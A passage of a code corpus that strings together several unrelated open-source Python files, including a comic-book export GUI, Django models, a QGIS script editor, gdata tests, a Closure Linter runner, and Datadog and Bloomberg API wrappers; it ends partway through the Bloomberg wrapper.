self.addImageFiles(filenames)
# Keep track of wherever they moved to find these files.
self.current_dir = os.path.split(str(filenames[0]))[0]
def onBookAddDirectory(self):
directory = QtGui.QFileDialog.getExistingDirectory(self, 'Select an image directory to add', self.current_dir)
if not directory.isNull():
self.addImageDirs([directory])
self.current_dir = str(directory)
def onBookShiftUp(self):
self.shiftImageFiles(-1)
def onBookShiftDown(self):
self.shiftImageFiles(1)
def onBookRemove(self):
self.removeImageFiles()
def onBookOptions(self):
dialog = DialogOptions(self, self.book)
dialog.exec_()
def onBookExport(self):
if len(self.book.images) == 0:
QtGui.QMessageBox.warning(self, 'Mangle', 'This book has no images to export')
return
if self.book.title == None:
dialog = DialogOptions(self, self.book)
if dialog.exec_() == QtGui.QDialog.Rejected:
return
# If exporting to CBZ, this is a filename. If not, this is a directory name.
out_path = ""
if self.book.cbz == False:
out_path = QtGui.QFileDialog.getExistingDirectory(self, 'Select a directory to export book to', self.current_dir)
# Keep track of wherever they moved to find this directory.
self.current_dir = str(out_path)
else:
out_path = QtGui.QFileDialog.getSaveFileName(
self,
                'Select a file to export the book to',
# Default to the current directory + the book's title + the cbz extension.
os.path.join(self.current_dir, "%s.cbz" % self.book.title),
'Comic Book Archive File (*.cbz);;All files (*.*)'
)
# Keep track of wherever they moved to find this file.
self.current_dir = os.path.split(str(out_path))[0]
if not out_path.isNull():
dialog = DialogConvert(self, self.book, out_path)
dialog.exec_()
def onHelpHomepage(self):
services = QtGui.QDesktopServices()
services.openUrl(QtCore.QUrl('http://foosoft.net/mangle'))
def onHelpAbout(self):
dialog = DialogAbout(self)
dialog.exec_()
def saveIfNeeded(self):
if not self.book.modified:
return True
result = QtGui.QMessageBox.question(
self,
'Mangle',
'Save changes to the current book?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No | QtGui.QMessageBox.Cancel,
QtGui.QMessageBox.Yes
)
return (
result == QtGui.QMessageBox.No or
            (result == QtGui.QMessageBox.Yes and self.saveBook())
)
def saveBook(self, browse=False):
if self.book.title == None:
QtGui.QMessageBox.warning(self, 'Mangle', 'You must specify a title for this book before saving')
return False
filename = self.book.filename
if filename == None or browse:
filename = QtGui.QFileDialog.getSaveFileName(
self,
'Select a book file to save as',
self.current_dir,
'Mangle files (*.mngl);;All files (*.*)'
)
if filename.isNull():
return False
filename = self.cleanupBookFile(filename)
self.current_dir = os.path.split(str(filename))[0]
try:
self.book.save(filename)
except RuntimeError, error:
QtGui.QMessageBox.critical(self, 'Mangle', str(error))
return False
return True
def loadBook(self, filename):
try:
self.book.load(filename)
except RuntimeError, error:
QtGui.QMessageBox.critical(self, 'Mangle', str(error))
else:
self.listWidgetFiles.clear()
for image in self.book.images:
self.listWidgetFiles.addItem(image)
def shiftImageFile(self, row, delta):
validShift = (
(delta > 0 and row < self.listWidgetFiles.count() - delta) or
(delta < 0 and row >= abs(delta))
)
if not validShift:
return
item = self.listWidgetFiles.takeItem(row)
self.listWidgetFiles.insertItem(row + delta, item)
self.listWidgetFiles.setItemSelected(item, True)
self.book.modified = True
self.book.images[row], self.book.images[row + delta] = (
self.book.images[row + delta], self.book.images[row]
)
def shiftImageFiles(self, delta):
items = self.listWidgetFiles.selectedItems()
rows = sorted([self.listWidgetFiles.row(item) for item in items])
for row in rows if delta < 0 else reversed(rows):
self.shiftImageFile(row, delta)
def removeImageFiles(self):
for item in self.listWidgetFiles.selectedItems():
row = self.listWidgetFiles.row(item)
self.listWidgetFiles.takeItem(row)
self.book.images.remove(item.text())
self.book.modified = True
def addImageFiles(self, filenames):
filenamesListed = []
for i in xrange(0, self.listWidgetFiles.count()):
filenamesListed.append(self.listWidgetFiles.item(i).text())
for filename in filenames:
if filename not in filenamesListed:
filename = QtCore.QString(filename)
self.listWidgetFiles.addItem(filename)
self.book.images.append(filename)
self.book.modified = True
def addImageDirs(self, directories):
filenames = []
for directory in directories:
for root, subdirs, subfiles in os.walk(unicode(directory)):
for filename in subfiles:
path = os.path.join(root, filename)
if self.isImageFile(path):
filenames.append(path)
self.addImageFiles(filenames)
def isImageFile(self, filename):
imageExts = ['.jpeg', '.jpg', '.gif', '.png']
filename = unicode(filename)
return (
os.path.isfile(filename) and
os.path.splitext(filename)[1].lower() in imageExts
)
def cleanupBookFile(self, filename):
if len(os.path.splitext(unicode(filename))[1]) == 0:
filename += '.mngl'
return filename
|
stahlnow/stahlnow
|
refs/heads/master
|
website/apps/projects/models.py
|
1
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.utils.timezone import now
from django.conf import settings
from projects.managers import PublicManager
from taggit.managers import TaggableManager
from fileupload.models import File
class Category(models.Model):
"""Category model."""
title = models.CharField(_('title'), max_length=100)
slug = models.SlugField(_('slug'), unique=True)
class Meta:
verbose_name = _('category')
verbose_name_plural = _('categories')
db_table = 'project_categories'
ordering = ('title',)
def __unicode__(self):
return u'%s' % self.title
class Project(models.Model):
"""Project model."""
STATUS_CHOICES = (
(1, _('Draft')),
(2, _('Public')),
)
title = models.CharField(_('title'), max_length=200)
slug = models.SlugField(_('slug'), unique_for_date='publish')
author = models.ForeignKey(User)
body = models.TextField(_('body'), )
teaser = models.ForeignKey(File, blank=True, null=True, on_delete=models.SET_NULL)
status = models.IntegerField(_('status'), choices=STATUS_CHOICES, default=2)
allow_comments = models.BooleanField(_('allow comments'), default=True)
publish = models.DateTimeField(_('publish'), default=now)
created = models.DateTimeField(_('created'), auto_now_add=True)
modified = models.DateTimeField(_('modified'), auto_now=True)
category = models.ForeignKey(Category, null=True)
my_order = models.PositiveIntegerField(default=0, blank=False, null=False)
tags = TaggableManager()
objects = PublicManager()
def image_tag(self):
return u'<img src="%s" width="400px" />' % (settings.FILES_URL + self.teaser.file.url)
image_tag.short_description = 'Teaser'
image_tag.allow_tags = True
class Meta:
verbose_name = _('project')
verbose_name_plural = _('projects')
db_table = 'project_projects'
ordering = ('my_order',)
get_latest_by = 'publish'
def __unicode__(self):
return u'%s' % self.title
@models.permalink
def get_absolute_url(self):
return 'project_detail', (), {'slug': self.slug}
def get_next(self):
next = Project.objects.filter(my_order__gt=self.my_order)
if next:
return next.first().get_absolute_url()
        return Project.objects.order_by('my_order').first().get_absolute_url()  # wrap around to the first project
def get_previous(self):
prev = Project.objects.filter(my_order__lt=self.my_order).order_by('-my_order')
if prev:
return prev.first().get_absolute_url()
return Project.objects.order_by('-my_order')[0].get_absolute_url()
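# Usage sketch for the wrap-around navigation above (hypothetical slug):
#
#   project = Project.objects.get(slug='some-project')
#   next_url = project.get_next()      # next project by my_order, wrapping to the first
#   prev_url = project.get_previous()  # previous project by my_order, wrapping to the last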
|
chhao91/QGIS
|
refs/heads/master
|
python/plugins/processing/gui/ScriptEdit.py
|
9
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
ScriptEdit.py
---------------------
Date : April 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'April 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtCore import Qt, QSettings
from PyQt4.QtGui import QFont, QColor, QShortcut, QKeySequence
from qgis.core import QgsApplication
from PyQt4.Qsci import QsciScintilla, QsciLexerPython, QsciAPIs
from processing.gui.LexerR import LexerR
class ScriptEdit(QsciScintilla):
LEXER_PYTHON = 0
LEXER_R = 1
def __init__(self, parent=None):
QsciScintilla.__init__(self, parent)
self.lexer = None
self.api = None
self.lexerType = -1
self.setCommonOptions()
self.initShortcuts()
def setCommonOptions(self):
# Enable non-ASCII characters
self.setUtf8(True)
# Default font
font = QFont()
font.setFamily('Courier')
font.setFixedPitch(True)
font.setPointSize(20)
self.setFont(font)
self.setMarginsFont(font)
self.initLexer()
self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
self.setWrapMode(QsciScintilla.WrapWord)
self.setWrapVisualFlags(QsciScintilla.WrapFlagByText,
QsciScintilla.WrapFlagNone, 4)
self.setSelectionForegroundColor(QColor('#2e3436'))
self.setSelectionBackgroundColor(QColor('#babdb6'))
# Show line numbers
self.setMarginWidth(1, '000')
self.setMarginLineNumbers(1, True)
self.setMarginsForegroundColor(QColor('#2e3436'))
self.setMarginsBackgroundColor(QColor('#babdb6'))
# Highlight current line
self.setCaretLineVisible(True)
self.setCaretLineBackgroundColor(QColor('#d3d7cf'))
# Folding
self.setFolding(QsciScintilla.BoxedTreeFoldStyle)
self.setFoldMarginColors(QColor('#d3d7cf'), QColor('#d3d7cf'))
# Mark column 80 with vertical line
self.setEdgeMode(QsciScintilla.EdgeLine)
self.setEdgeColumn(80)
self.setEdgeColor(QColor('#eeeeec'))
# Indentation
self.setAutoIndent(True)
self.setIndentationsUseTabs(False)
self.setIndentationWidth(4)
self.setTabIndents(True)
self.setBackspaceUnindents(True)
self.setTabWidth(4)
        # Autocompletion
self.setAutoCompletionThreshold(2)
self.setAutoCompletionSource(QsciScintilla.AcsAPIs)
self.setFonts(10)
def setFonts(self, size):
# Load font from Python console settings
settings = QSettings()
fontName = settings.value('pythonConsole/fontfamilytext', 'Monospace')
fontSize = int(settings.value('pythonConsole/fontsize', size))
self.defaultFont = QFont(fontName)
self.defaultFont.setFixedPitch(True)
self.defaultFont.setPointSize(fontSize)
self.defaultFont.setStyleHint(QFont.TypeWriter)
self.defaultFont.setStretch(QFont.SemiCondensed)
self.defaultFont.setLetterSpacing(QFont.PercentageSpacing, 87.0)
self.defaultFont.setBold(False)
self.boldFont = QFont(self.defaultFont)
self.boldFont.setBold(True)
self.italicFont = QFont(self.defaultFont)
self.italicFont.setItalic(True)
self.setFont(self.defaultFont)
self.setMarginsFont(self.defaultFont)
def initShortcuts(self):
(ctrl, shift) = (self.SCMOD_CTRL << 16, self.SCMOD_SHIFT << 16)
# Disable some shortcuts
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('D') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl
+ shift)
self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('T') + ctrl)
#self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord("Z") + ctrl)
#self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord("Y") + ctrl)
# Use Ctrl+Space for autocompletion
self.shortcutAutocomplete = QShortcut(QKeySequence(Qt.CTRL
+ Qt.Key_Space), self)
self.shortcutAutocomplete.setContext(Qt.WidgetShortcut)
self.shortcutAutocomplete.activated.connect(self.autoComplete)
def autoComplete(self):
self.autoCompleteFromAll()
def setLexerType(self, lexerType):
self.lexerType = lexerType
self.initLexer()
def initLexer(self):
if self.lexerType == self.LEXER_PYTHON:
self.lexer = QsciLexerPython()
colorDefault = QColor('#2e3436')
colorComment = QColor('#c00')
colorCommentBlock = QColor('#3465a4')
colorNumber = QColor('#4e9a06')
colorType = QColor('#4e9a06')
colorKeyword = QColor('#204a87')
colorString = QColor('#ce5c00')
self.lexer.setDefaultFont(self.defaultFont)
self.lexer.setDefaultColor(colorDefault)
self.lexer.setColor(colorComment, 1)
self.lexer.setColor(colorNumber, 2)
self.lexer.setColor(colorString, 3)
self.lexer.setColor(colorString, 4)
self.lexer.setColor(colorKeyword, 5)
self.lexer.setColor(colorString, 6)
self.lexer.setColor(colorString, 7)
self.lexer.setColor(colorType, 8)
self.lexer.setColor(colorCommentBlock, 12)
self.lexer.setColor(colorString, 15)
self.lexer.setFont(self.italicFont, 1)
self.lexer.setFont(self.boldFont, 5)
self.lexer.setFont(self.boldFont, 8)
self.lexer.setFont(self.italicFont, 12)
self.api = QsciAPIs(self.lexer)
settings = QSettings()
useDefaultAPI = bool(settings.value('pythonConsole/preloadAPI',
True))
if useDefaultAPI:
# Load QGIS API shipped with Python console
self.api.loadPrepared(
os.path.join(QgsApplication.pkgDataPath(),
'python', 'qsci_apis', 'pyqgis.pap'))
else:
# Load user-defined API files
apiPaths = settings.value('pythonConsole/userAPI', [])
for path in apiPaths:
self.api.load(path)
self.api.prepare()
self.lexer.setAPIs(self.api)
elif self.lexerType == self.LEXER_R:
# R lexer
self.lexer = LexerR()
self.setLexer(self.lexer)
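# Usage sketch (assumes a running QApplication, as inside QGIS):
#
#   editor = ScriptEdit()
#   editor.setLexerType(ScriptEdit.LEXER_PYTHON)
#   editor.setText('print "hello"')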
|
mkieszek/odoo
|
refs/heads/master
|
addons/website_portal_sale/__init__.py
|
1350
|
import controllers
|
vlachoudis/sl4a
|
refs/heads/master
|
python-build/python-libs/gdata/tests/gdata_tests/docs_test.py
|
89
|
#!/usr/bin/python
#
# Copyright (C) 2006 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = ('api.jfisher (Jeff Fisher), '
'api.eric@google.com (Eric Bidelman)')
import unittest
from gdata import test_data
import gdata.docs
class DocumentListEntryTest(unittest.TestCase):
def setUp(self):
self.dl_entry = gdata.docs.DocumentListEntryFromString(
test_data.DOCUMENT_LIST_ENTRY)
def testToAndFromStringWithData(self):
entry = gdata.docs.DocumentListEntryFromString(str(self.dl_entry))
self.assertEqual(entry.author[0].name.text, 'test.user')
self.assertEqual(entry.author[0].email.text, 'test.user@gmail.com')
self.assertEqual(entry.GetDocumentType(), 'spreadsheet')
self.assertEqual(entry.id.text,
'http://docs.google.com/feeds/documents/private/full/' +\
'spreadsheet%3Asupercalifragilisticexpealidocious')
self.assertEqual(entry.title.text,'Test Spreadsheet')
self.assertEqual(entry.resourceId.text,
'spreadsheet:supercalifragilisticexpealidocious')
self.assertEqual(entry.lastModifiedBy.name.text,'test.user')
self.assertEqual(entry.lastModifiedBy.email.text,'test.user@gmail.com')
self.assertEqual(entry.lastViewed.text,'2009-03-05T07:48:21.493Z')
self.assertEqual(entry.writersCanInvite.value, 'true')
class DocumentListFeedTest(unittest.TestCase):
def setUp(self):
self.dl_feed = gdata.docs.DocumentListFeedFromString(
test_data.DOCUMENT_LIST_FEED)
def testToAndFromString(self):
self.assert_(len(self.dl_feed.entry) == 2)
for an_entry in self.dl_feed.entry:
self.assert_(isinstance(an_entry, gdata.docs.DocumentListEntry))
new_dl_feed = gdata.docs.DocumentListFeedFromString(str(self.dl_feed))
for an_entry in new_dl_feed.entry:
self.assert_(isinstance(an_entry, gdata.docs.DocumentListEntry))
def testConvertActualData(self):
for an_entry in self.dl_feed.entry:
self.assertEqual(an_entry.author[0].name.text, 'test.user')
self.assertEqual(an_entry.author[0].email.text, 'test.user@gmail.com')
self.assertEqual(an_entry.lastModifiedBy.name.text, 'test.user')
self.assertEqual(an_entry.lastModifiedBy.email.text,
'test.user@gmail.com')
self.assertEqual(an_entry.lastViewed.text,'2009-03-05T07:48:21.493Z')
if(an_entry.GetDocumentType() == 'spreadsheet'):
self.assertEqual(an_entry.title.text, 'Test Spreadsheet')
self.assertEqual(an_entry.writersCanInvite.value, 'true')
elif(an_entry.GetDocumentType() == 'document'):
self.assertEqual(an_entry.title.text, 'Test Document')
self.assertEqual(an_entry.writersCanInvite.value, 'false')
def testLinkFinderFindsLinks(self):
for entry in self.dl_feed.entry:
# All Document List entries should have a self link
self.assert_(entry.GetSelfLink() is not None)
# All Document List entries should have an HTML link
self.assert_(entry.GetHtmlLink() is not None)
self.assert_(entry.feedLink.href is not None)
class DocumentListAclEntryTest(unittest.TestCase):
def setUp(self):
self.acl_entry = gdata.docs.DocumentListAclEntryFromString(
test_data.DOCUMENT_LIST_ACL_ENTRY)
def testToAndFromString(self):
self.assert_(isinstance(self.acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(self.acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(self.acl_entry.scope, gdata.docs.Scope))
self.assertEqual(self.acl_entry.scope.value, 'user@gmail.com')
self.assertEqual(self.acl_entry.scope.type, 'user')
self.assertEqual(self.acl_entry.role.value, 'writer')
acl_entry_str = str(self.acl_entry)
new_acl_entry = gdata.docs.DocumentListAclEntryFromString(acl_entry_str)
self.assert_(isinstance(new_acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(new_acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(new_acl_entry.scope, gdata.docs.Scope))
self.assertEqual(new_acl_entry.scope.value, self.acl_entry.scope.value)
self.assertEqual(new_acl_entry.scope.type, self.acl_entry.scope.type)
self.assertEqual(new_acl_entry.role.value, self.acl_entry.role.value)
def testCreateNewAclEntry(self):
cat = gdata.atom.Category(
term='http://schemas.google.com/acl/2007#accessRule',
scheme='http://schemas.google.com/g/2005#kind')
acl_entry = gdata.docs.DocumentListAclEntry(category=[cat])
acl_entry.scope = gdata.docs.Scope(value='user@gmail.com', type='user')
acl_entry.role = gdata.docs.Role(value='writer')
self.assert_(isinstance(acl_entry, gdata.docs.DocumentListAclEntry))
self.assert_(isinstance(acl_entry.role, gdata.docs.Role))
self.assert_(isinstance(acl_entry.scope, gdata.docs.Scope))
self.assertEqual(acl_entry.scope.value, 'user@gmail.com')
self.assertEqual(acl_entry.scope.type, 'user')
self.assertEqual(acl_entry.role.value, 'writer')
class DocumentListAclFeedTest(unittest.TestCase):
def setUp(self):
self.feed = gdata.docs.DocumentListAclFeedFromString(
test_data.DOCUMENT_LIST_ACL_FEED)
def testToAndFromString(self):
for entry in self.feed.entry:
self.assert_(isinstance(entry, gdata.docs.DocumentListAclEntry))
feed = gdata.docs.DocumentListAclFeedFromString(str(self.feed))
for entry in feed.entry:
self.assert_(isinstance(entry, gdata.docs.DocumentListAclEntry))
def testConvertActualData(self):
entries = self.feed.entry
self.assert_(len(entries) == 2)
self.assertEqual(entries[0].title.text,
'Document Permission - user@gmail.com')
self.assertEqual(entries[0].role.value, 'owner')
self.assertEqual(entries[0].scope.type, 'user')
self.assertEqual(entries[0].scope.value, 'user@gmail.com')
self.assert_(entries[0].GetSelfLink() is not None)
self.assert_(entries[0].GetEditLink() is not None)
self.assertEqual(entries[1].title.text,
'Document Permission - user2@google.com')
self.assertEqual(entries[1].role.value, 'writer')
self.assertEqual(entries[1].scope.type, 'domain')
self.assertEqual(entries[1].scope.value, 'google.com')
self.assert_(entries[1].GetSelfLink() is not None)
self.assert_(entries[1].GetEditLink() is not None)
if __name__ == '__main__':
unittest.main()
|
joaquimrocha/Rancho
|
refs/heads/master
|
rancho/milestone/models.py
|
1
|
########################################################################
# Rancho - Open Source Group/Project Management Tool
# Copyright (C) 2008 The Rancho Team
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
########################################################################
from datetime import date, datetime
from django.contrib.auth.models import User
from django.db import models
from rancho.project.models import Project
class MilestoneManager(models.Manager):
def get_late_milestones(self, project = None, order = '-due_date', user = None):
milestones = Milestone.objects.filter(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return [milestone for milestone in milestones if milestone.is_late()]
def get_upcoming_milestones(self, project = None, order = 'due_date', user = None):
milestones = Milestone.objects.filter(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return [milestone for milestone in milestones if milestone.is_upcoming()]
def get_complete_milestones(self, project = None, order = 'completion_date', user = None):
milestones = Milestone.objects.all().exclude(completion_date = None).order_by(order)
if project:
milestones = milestones.filter(project = project).order_by(order)
if user:
milestones = milestones.filter(models.Q(responsible = user) | models.Q(responsible = None)).order_by(order)
return milestones
class Milestone(models.Model):
creator = models.ForeignKey(User)
project = models.ForeignKey(Project)
    # If null, the whole project is responsible
responsible = models.ForeignKey(User, related_name='responsible', null=True)
title = models.CharField(max_length=500)
    creation_date = models.DateTimeField(default=datetime.now)  # callable: evaluated on each save, not once at import
due_date = models.DateTimeField()
send_notification_email = models.BooleanField()
completion_date = models.DateTimeField(null=True)
sent_notification = models.BooleanField(default=False)
objects = MilestoneManager()
@models.permalink
def get_absolute_url(self):
return ('rancho.milestone.views.edit', [], {'p_id': self.project.id, 'milestone_id':self.id})
def is_late(self):
return self.due_date.date() <= date.today() and \
not self.completion_date
def is_upcoming(self):
return self.due_date.date() > date.today() and \
not self.completion_date
def is_complete(self):
return self.completion_date != None
def get_status_name(self):
if self.is_late():
return 'late'
elif self.is_upcoming():
return 'upcoming'
else:
return 'complete'
def _get_todolist(self):
todolist_set = self.todo_milestone.all()
if todolist_set:
return todolist_set[0]
return None
todolist = property(_get_todolist)
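# Usage sketch for the manager queries above:
#
#   late = Milestone.objects.get_late_milestones(project=project, user=user)
#   upcoming = Milestone.objects.get_upcoming_milestones(project=project)
#   complete = Milestone.objects.get_complete_milestones(project=project)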
|
jessekl/flixr
|
refs/heads/master
|
venv/lib/python2.7/site-packages/flask/testsuite/test_apps/config_module_app.py
|
1257
|
import os
import flask
here = os.path.abspath(os.path.dirname(__file__))
app = flask.Flask(__name__)
|
manelvf/closure-linter
|
refs/heads/master
|
closure_linter/runner.py
|
102
|
#!/usr/bin/env python
#
# Copyright 2012 The Closure Linter Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main lint function. Tokenizes file, runs passes, and feeds to checker."""
# Allow non-Google copyright
# pylint: disable=g-bad-file-header
__author__ = 'nnaze@google.com (Nathan Naze)'
import traceback
import gflags as flags
from closure_linter import checker
from closure_linter import ecmalintrules
from closure_linter import ecmametadatapass
from closure_linter import error_check
from closure_linter import errors
from closure_linter import javascriptstatetracker
from closure_linter import javascripttokenizer
from closure_linter.common import error
from closure_linter.common import htmlutil
from closure_linter.common import tokens
flags.DEFINE_list('limited_doc_files', ['dummy.js', 'externs.js'],
'List of files with relaxed documentation checks. Will not '
'report errors for missing documentation, some missing '
'descriptions, or methods whose @return tags don\'t have a '
'matching return statement.')
flags.DEFINE_boolean('error_trace', False,
'Whether to show error exceptions.')
flags.ADOPT_module_key_flags(checker)
flags.ADOPT_module_key_flags(ecmalintrules)
flags.ADOPT_module_key_flags(error_check)
def _GetLastNonWhiteSpaceToken(start_token):
"""Get the last non-whitespace token in a token stream."""
ret_token = None
whitespace_tokens = frozenset([
tokens.TokenType.WHITESPACE, tokens.TokenType.BLANK_LINE])
for t in start_token:
if t.type not in whitespace_tokens:
ret_token = t
return ret_token
def _IsHtml(filename):
return filename.endswith('.html') or filename.endswith('.htm')
def _Tokenize(fileobj):
"""Tokenize a file.
Args:
fileobj: file-like object (or iterable lines) with the source.
Returns:
The first token in the token stream and the ending mode of the tokenizer.
"""
tokenizer = javascripttokenizer.JavaScriptTokenizer()
start_token = tokenizer.TokenizeFile(fileobj)
return start_token, tokenizer.mode
def _IsLimitedDocCheck(filename, limited_doc_files):
"""Whether this this a limited-doc file.
Args:
filename: The filename.
limited_doc_files: Iterable of strings. Suffixes of filenames that should
be limited doc check.
Returns:
Whether the file should be limited check.
"""
for limited_doc_filename in limited_doc_files:
if filename.endswith(limited_doc_filename):
return True
return False
def Run(filename, error_handler, source=None):
"""Tokenize, run passes, and check the given file.
Args:
filename: The path of the file to check
error_handler: The error handler to report errors to.
source: A file-like object with the file source. If omitted, the file will
be read from the filename path.
"""
if not source:
try:
source = open(filename)
except IOError:
error_handler.HandleFile(filename, None)
error_handler.HandleError(
error.Error(errors.FILE_NOT_FOUND, 'File not found'))
error_handler.FinishFile()
return
if _IsHtml(filename):
source_file = htmlutil.GetScriptLines(source)
else:
source_file = source
token, tokenizer_mode = _Tokenize(source_file)
error_handler.HandleFile(filename, token)
  # If we did not end in the basic mode, this is a failed parse.
if tokenizer_mode is not javascripttokenizer.JavaScriptModes.TEXT_MODE:
error_handler.HandleError(
error.Error(errors.FILE_IN_BLOCK,
'File ended in mode "%s".' % tokenizer_mode,
_GetLastNonWhiteSpaceToken(token)))
# Run the ECMA pass
error_token = None
ecma_pass = ecmametadatapass.EcmaMetaDataPass()
error_token = RunMetaDataPass(token, ecma_pass, error_handler, filename)
is_limited_doc_check = (
_IsLimitedDocCheck(filename, flags.FLAGS.limited_doc_files))
_RunChecker(token, error_handler,
is_limited_doc_check,
is_html=_IsHtml(filename),
stop_token=error_token)
error_handler.FinishFile()
def RunMetaDataPass(start_token, metadata_pass, error_handler, filename=''):
"""Run a metadata pass over a token stream.
Args:
start_token: The first token in a token stream.
metadata_pass: Metadata pass to run.
error_handler: The error handler to report errors to.
filename: Filename of the source.
Returns:
The token where the error occurred (if any).
"""
try:
metadata_pass.Process(start_token)
except ecmametadatapass.ParseError, parse_err:
if flags.FLAGS.error_trace:
traceback.print_exc()
error_token = parse_err.token
error_msg = str(parse_err)
error_handler.HandleError(
error.Error(errors.FILE_DOES_NOT_PARSE,
('Error parsing file at token "%s". Unable to '
'check the rest of file.'
'\nError "%s"' % (error_token, error_msg)), error_token))
return error_token
except Exception: # pylint: disable=broad-except
traceback.print_exc()
error_handler.HandleError(
error.Error(
errors.FILE_DOES_NOT_PARSE,
'Internal error in %s' % filename))
def _RunChecker(start_token, error_handler,
limited_doc_checks, is_html,
stop_token=None):
state_tracker = javascriptstatetracker.JavaScriptStateTracker()
style_checker = checker.JavaScriptStyleChecker(
state_tracker=state_tracker,
error_handler=error_handler)
style_checker.Check(start_token,
is_html=is_html,
limited_doc_checks=limited_doc_checks,
stop_token=stop_token)
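# Usage sketch (assumes the ErrorAccumulator handler shipped in
# closure_linter.common.erroraccumulator):
#
#   from closure_linter.common import erroraccumulator
#   handler = erroraccumulator.ErrorAccumulator()
#   Run('foo.js', handler)
#   print handler.GetErrors()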
|
clokep/datadogpy
|
refs/heads/master
|
datadog/api/users.py
|
5
|
from datadog.api.base import ActionAPIResource
class User(ActionAPIResource):
"""
A wrapper around User HTTP API.
"""
@classmethod
def invite(cls, emails):
"""
        Send an invite to join Datadog to each of the email addresses in the
        *emails* list. If *emails* is a string, it will be wrapped in a list and
        sent. Returns a list of email addresses for which an email was sent.
        :param emails: email addresses to invite to join Datadog
:type emails: string list
:returns: JSON response from HTTP request
"""
if not isinstance(emails, list):
emails = [emails]
body = {
'emails': emails,
}
return super(User, cls)._trigger_action('POST', '/invite_users', **body)
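# Usage sketch (assumes datadog.initialize() was called with valid API and
# application keys):
#
#   from datadog import initialize, api
#   initialize(api_key='<api_key>', app_key='<app_key>')
#   api.User.invite(['new.user@example.com'])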
|
louisLouL/pair_trading
|
refs/heads/master
|
hist_data/blp/blp_api.py
|
1
|
"""
Python wrapper to download data through the Bloomberg Open API
Written by Alexandre Almosni alexandre.almosni@gmail.com
(C) 2014-2017 Alexandre Almosni
Released under Apache 2.0 license. More info at http://www.apache.org/licenses/LICENSE-2.0
"""
from __future__ import print_function
from abc import ABCMeta, abstractmethod
import blpapi
import datetime
import pandas
import threading
# Pre-creating these Name objects makes successive requests faster
DATE = blpapi.Name("date")
ERROR_INFO = blpapi.Name("errorInfo")
EVENT_TIME = blpapi.Name("EVENT_TIME")
FIELD_DATA = blpapi.Name("fieldData")
FIELD_EXCEPTIONS = blpapi.Name("fieldExceptions")
FIELD_ID = blpapi.Name("fieldId")
SECURITY = blpapi.Name("security")
SECURITY_DATA = blpapi.Name("securityData")
################################################
class BLP():
"""Naive implementation of the Request/Response Paradigm closely matching the Excel API.
    Sharing one session for subsequent requests is faster; however, it is not thread-safe, as some events can come faster than others.
bdp returns a string, bdh returns a pandas DataFrame.
This is mostly useful for scripting, but care should be taken when used in a real world application.
"""
def __init__(self):
self.session = blpapi.Session()
self.session.start()
self.session.openService('//BLP/refdata')
self.refDataSvc = self.session.getService('//BLP/refdata')
def bdp(self, strSecurity='US900123AL40 Govt', strData='PX_LAST', strOverrideField='', strOverrideValue=''):
request = self.refDataSvc.createRequest('ReferenceDataRequest')
request.append('securities', strSecurity)
request.append('fields', strData)
if strOverrideField != '':
o = request.getElement('overrides').appendElement()
o.setElement('fieldId', strOverrideField)
o.setElement('value', strOverrideValue)
requestID = self.session.sendRequest(request)
while True:
event = self.session.nextEvent()
if event.eventType() == blpapi.event.Event.RESPONSE:
break
try:
output = blpapi.event.MessageIterator(event).next().getElement(SECURITY_DATA).getValueAsElement(
0).getElement(FIELD_DATA).getElementAsString(strData)
if output == '#N/A':
output = pandas.np.nan
except:
print('error with ' + strSecurity + ' ' + strData)
output = pandas.np.nan
return output
def bdh(self, strSecurity='SPX Index', strData='PX_LAST', startdate=datetime.date(2014, 1, 1),
